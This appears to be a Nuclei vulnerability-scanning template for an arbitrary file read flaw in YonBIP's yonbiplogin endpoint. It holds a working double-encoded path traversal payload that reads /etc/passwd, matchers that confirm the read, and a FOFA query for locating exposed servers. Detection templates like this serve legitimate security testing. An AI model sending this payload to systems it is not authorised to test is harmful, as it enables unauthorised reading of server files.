id: yonyou-yonbip-lfi

info:
  name: YonBIP - Arbitrary File Read
  author: l1b3r
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in yonbiplogin, the advanced version of YonBIP
  reference:
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BYonBIP%E9%AB%98%E7%BA%A7%E7%89%88yonbiplogin%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="YonBIP" || title="数字化工作台"
  tags: yonyou,yonbip,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js"

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(content_type, "application/javascript")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100e083636092983d6156fc67e225358ce5a82ac1df5ed58d652ad196e04e8bdc0202207d5615f8f628eb53985cb94c773795058d8e5df22b97b2efdf7c1128ffba0262:922c64590222798bb761d5b6d8e72950